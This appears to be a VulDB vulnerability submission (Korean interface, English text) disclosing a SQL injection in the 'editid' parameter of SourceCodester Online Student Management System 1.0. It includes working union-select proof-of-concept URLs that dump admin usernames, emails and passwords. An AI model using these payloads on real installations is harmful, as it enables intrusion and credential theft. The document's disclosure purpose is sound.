| 제목 | eduAuthorities sql Injection |
|---|
| 설명 | Download link: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
Version environment:
php=7.3.4
Mysql=5.7.26
Apache=2.4.39
Preparation:
Create a "student" database in mysql.
Set the database username and password in "dbconnection.php", and then access http://localhost/eduauth/index.php to log in with the account and password.
Vulnerability:
http://localhost/eduauth/edit-class-detail.php?editid=1
On line 54 of the "edit-class-detail.php" file, the parameter "editid" is not filtered and can be directly exploited.
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName),3,4%20from%20tbladmin#
You can see that data information is returned.
Poc:
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName,'~',Email,'·',Password),3,4%20from%20tbladmin#
Vulnerability principle:
Check the "edit-class-edit-detail.php" file.
On line 55, the user input parameter "editid" is directly concatenated into the SQL statement, and on line 57, a query is performed. |
|---|
| 사용자 | 0chen (UID 41914) |
|---|
| 제출 | 2023. 02. 28. AM 08:35 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 02. 28. PM 09:03 (12 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 222002 [SourceCodester Online Student Management System 1.0 edit-class-detail.php editid SQL 주입] |
|---|
| 포인트들 | 17 |
|---|